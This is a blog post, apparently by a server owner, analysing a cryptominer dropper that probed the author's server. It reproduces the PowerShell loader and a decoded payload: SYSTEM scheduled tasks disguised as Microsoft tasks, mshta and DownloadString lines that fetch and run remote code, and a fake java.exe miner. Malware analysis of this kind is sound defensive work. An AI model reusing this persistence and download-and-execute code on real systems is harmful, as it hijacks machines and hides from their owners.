Finally, a chance to grab the Windows binaries that eluded me in my previous attempts during Dis-invited By User Agent. I had the same attack probing my server this morning attempting to download and execute a Windows script, but this time I determined the correct user agent for the .Net WebClient class - it’s blank. The class, by default, doesn’t send any headers…

curl -A "" hxxp:// -o checking.ps1

$W = New-Object System.Net.WebClient
$arch = Get-WmiObject Win32_Processor | Select-Object -Exp AddressWidth
$priv = [bool](([System.Security.Principal.WindowsIdentity]::GetCurrent()).groups -match "S-1-5-32-544")
$osver =  ([environment]::OSVersion.Version).Major

Function win10() {
        mkdir C:\ProgramData\Oracle
        mkdir C:\ProgramData\Oracle\Java
        cmd /c SCHTASKS /create /tn \Microsoft\Windows\MobilePC\DetectPC /sc MINUTE /f  /mo 10 /tr "cmd /c C:\Windows\Fonts\sasd.bat"  /ru "NT AUTHORITY\SYSTEM" 	
        cmd /c schtasks /tn \Microsoft\Windows\MobilePC\DetectPC /run
        cmd /c SCHTASKS /create /tn \Microsoft\Windows\Shell\WindowsShellUpdate /sc HOURLY /f  /mo 6 /tr "cmd /c mshta hxxp://"  /ru "NT AUTHORITY\SYSTEM"   /RL HIGHEST
        cmd /c SCHTASKS /create /tn \Microsoft\Windows\Shell\WinShell /sc DAILY /f  /mo 1 /tr "cmd /c mshta hxxp://"  /ru SYSTEM   /RL HIGHEST
        cmd /c SCHTASKS /create /tn \Microsoft\Windows\UPnP\UPnPHost /sc DAILY /f  /mo 2 /tr "cmd /c mshta hxxp://"  /ru SYSTEM   /RL HIGHEST
        cmd /c SCHTASKS /create /tn \Microsoft\Windows\Registry\RegBackup /sc MINUTE /f  /mo 5 /tr "cmd /c schtasks /tn \Microsoft\Windows\Bluetooth\UpdateDeviceTask /run"  /ru "NT AUTHORITY\SYSTEM"   /RL HIGHEST
	kill $pid

Function PrivTrue() {
	mkdir C:\ProgramData\Oracle
	mkdir C:\ProgramData\Oracle\Java
	IF ($arch -eq "64")
	cmd /c schtasks  /create /TN \Microsoft\Windows\Bluetooth\UpdateDeviceTask /TR "C:\ProgramData\Oracle\Java\java.exe" /ST 00:00 /SC once /DU 599940 /RI 1 /F /RL HIGHEST /RU SYSTEM
	cmd /c SCHTASKS /create /tn \Microsoft\Windows\Shell\WindowsShellUpdate /sc HOURLY /f  /mo 6 /tr "cmd /c mshta hxxp://"  /ru "NT AUTHORITY\SYSTEM"   /RL HIGHEST	
	cmd /c SCHTASKS /create /tn \Microsoft\Windows\Shell\WinShell /sc DAILY /f  /mo 1 /tr "cmd /c mshta hxxp://"  /ru SYSTEM   /RL HIGHEST
	cmd /c SCHTASKS /create /tn \Microsoft\Windows\UPnP\UPnPHost /sc DAILY /f  /mo 2 /tr "cmd /c mshta hxxp://"  /ru SYSTEM   /RL HIGHEST
	cmd /c SCHTASKS /create /tn "\Microsoft\Windows\EDP\EDP App Lock Task"  /sc hourly /f  /mo 22 /tr "cmd /c mshta hxxp://"  /ru SYSTEM
	cmd /c SCHTASKS /create /tn \Microsoft\Windows\Registry\RegBackup /sc MINUTE /f  /mo 5 /tr "cmd /c schtasks /tn \Microsoft\Windows\Bluetooth\UpdateDeviceTask /run"  /ru "NT AUTHORITY\SYSTEM"   /RL HIGHEST 
	cmd /c schtasks /tn  \Microsoft\Windows\Bluetooth\UpdateDeviceTask /run
	cmd /c SCHTASKS /create /tn \Microsoft\Windows\MobilePC\DetectPC /sc MINUTE /f  /mo 10 /tr "cmd /c C:\Windows\Fonts\sasd.bat"  /ru "NT AUTHORITY\SYSTEM"   

Function PrivFalse() {
	cmd /c SCHTASKS /create /tn "Optimize Start Menu Cache Files-S-3-5-21-2236678155-433519125-1142214968-1037" /sc MINUTE /f  /mo 5 /tr "cmd /c %appdata%\Microsoft\Network\PrivFalse.bat"
	cmd /c SCHTASKS /create /tn "Optimize Start Menu Cache Files-S-3-5-21-2236678155-433529325-1142214968-1037" /sc HOURLY /f  /mo 22 /tr "cmd /c mshta hxxp://"
	cmd /c SCHTASKS /create /tn "Optimize Start Menu Cache Files-S-3-5-21-2236678155-433529325-1142214968-1137" /sc HOURLY /f  /mo 20 /tr "cmd /c mshta hxxp://"

Function CleanerEtc() {
	C:\Windows\System32\schtasks.exe /f /tn "\Microsoft\Windows\MUI\LPupdate" /tr "cmd /c powershell -exec bypass C:\Windows\Fonts\del.ps1" /ru SYSTEM /sc HOURLY /mo 4 /create

Function PrivFalsemStop() {
	cmd /c schtasks /tn "Optimize Start Menu Cache Files-S-3-5-21-2236678155-433519125-1142214968-1037" /delefe /f
	cmd /c wmic process where executablepath="C:\\ProgramData\\Oracle\\Java\\java.exe" delete 
        start-sleep 1
	cmd /c del /q /f "C:\ProgramData\Oracle\Java\java.exe"

Function PrivTrueMStop() {
	cmd /c schtasks /tn \Microsoft\Windows\Registry\RegBackup /delete /f
	cmd /c schtasks /tn \Microsoft\Windows\Bluetooth\UpdateDeviceTask /end
	cmd /c wmic process where executablepath="C:\\ProgramData\\Oracle\\Java\\java.exe" delete 
	start-sleep 1
	cmd /c del /q /f C:\ProgramData\Oracle\Java\java.exe

IF ($osver -eq "10")
	echo "win10"

IF ($priv -eq $true)
	start-sleep 5
#cmd /c powershell  -w 1 -NoProfile -InputFormat None -ExecutionPolicy Bypass -Command iex ((New-Object System.Net.WebClient).DownloadString('hxxp://'))
cmd /c taskkill /im mshta.exe /f

Finally, awesome. And a whole bunch of other great stuff to download too, including a bunch of stuff VirusTotal hasn’t seen yet.

The main tactic used in here is setting up persistence using scheduled tasks - an oldie but a goodie.

Lots of use of mshta too… Pretty cool. This allows execution of VBScript, which re-downloads and executes the checking.ps1.

Dropping a fake Java… Nice. Makes it look like the executable isn’t unfriendly… But at least the 32-bit version is UPX packed.

privfalse.bat contains some powershell which looks like it does some text replacement, maybe base64 decoding, then executes the result. Here’s the un-base64 encoded version…

$arch = Get-WmiObject Win32_Processor | Select-Object -Exp AddressWidth
$WebClient = New-Object System.Net.WebClient
mkdir C:\ProgramData\Oracle\Java > $null
if((Test-Path $env:Temp\waqs.txt) -eq $true)
	echo "Pass"
} else {
echo "98098" > $env:Temp\waqs.txt
$pidm = Get-Content $env:Temp\waqs.txt 

if((Test-Path C:\ProgramData\Oracle\Java\java.exe) -eq $true)
    echo "pass miner"
else {
		IF ($arch -eq "64")

if((get-process -id $pidm -ErrorAction SilentlyContinue) -eq $Null){ 
			(invoke-wmimethod win32_process -name create -argumentlist 'C:\\ProgramData\\Oracle\\Java\\java.exe').ProcessId > $env:Temp\waqs.txt

		echo $null